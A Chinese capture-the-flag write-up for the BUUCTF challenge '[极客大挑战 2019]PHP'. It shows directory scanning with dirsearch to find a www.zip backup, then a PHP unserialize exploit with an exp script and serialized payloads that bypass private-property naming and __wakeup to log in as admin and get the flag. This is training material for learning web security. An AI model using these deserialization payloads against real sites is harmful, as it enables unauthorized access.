[极客大挑战 2019]PHP 1

2023-11-09 10:37:38 浏览数 (1)

题目环境:

注意这四个字“备份网站”,让我想到了之前自己做网站的时候,有一次上传FTP网站文件,不小心把全部网站文件清空了,我伤心欲绝没有做网站备份文件,自此以后我就把网站文件在本地备份了一份,每更新网站有一次就在本地备份一次,备份格式是ZIP格式,比较节省空间,所以我这猜测它网站后台必定又一个网站备份ZIP文件

使用dirsearch工具扫描网站后台(这个工具是我最喜欢的,扫描的比较全面,大部分都可以扫描到,博主有压缩文件可以私聊我进行领取!) python dirsearch.py -u http://a02fc32b-1091-4b95-a4a1-27fb1bc51ba1.node4.buuoj.cn:81/

回车

大概需要好几分钟(需耐心等待) 扫描出www.zip压缩文件

下载www.zip文件

回车进行下载

假的flag文件

查看index.php文件

发现参数select(通过GET方式进行传参) unserialize反序列化

查看class.php文件

一道反序列化题目(相对简单的反序列化题目)

PHP魔法函数以及其他函数的理解可以看这两篇文章:https://blog.csdn.net/m0_73734159/article/details/133854073?spm=1001.2014.3001.5502 https://blog.csdn.net/m0_73734159/article/details/130661423?spm=1001.2014.3001.5502 private私有变量,对象和变量名前需要用进行绕过 wakeup魔法函数,只需要大于实际变量数即可绕过,比如本题中有两个变量username和password,所以序列化就是O:4:“Name”:2:,O对象名,4就是Name是4个字符,2就是Name对象里面有两个变量,大于实际变量数即可绕过O:4:“Name”:3: var_dump函数显示关于一个或多个表达式的结构信息,包括表达式的类型与值。数组将递归展开值,通过缩进显示其结构。

想要于万军之中取flag首级(只须满足两个条件)

1、满足password=100 2、满足username=‘admin’

构造exp(取关键代码进行构造)

代码语言:javascript复制
<?php
  class Name
{
  private $username = 'nonono';
  private $password = 'yesyes';

public function __construct($username, $password)
  {
    $this->username = $username;
    $this->password = $password;
  }
}
$flag=new Name('admin',100);
var_dump(serialize($flag));
?>

payload:

O:4:"Name":2:{s:14:"00Name00username";s:5:"admin";s:14:"00Name00password";i:100;} 绕过private和wakeup O:4:"Name":3:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;} 最终payload: ?select=O:4:"Name":3:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";i:100;} 上传payload:

得到flag: flag{5750f1c4-ad75-42cf-9bd2-79e668cfc3a4}

0 人点赞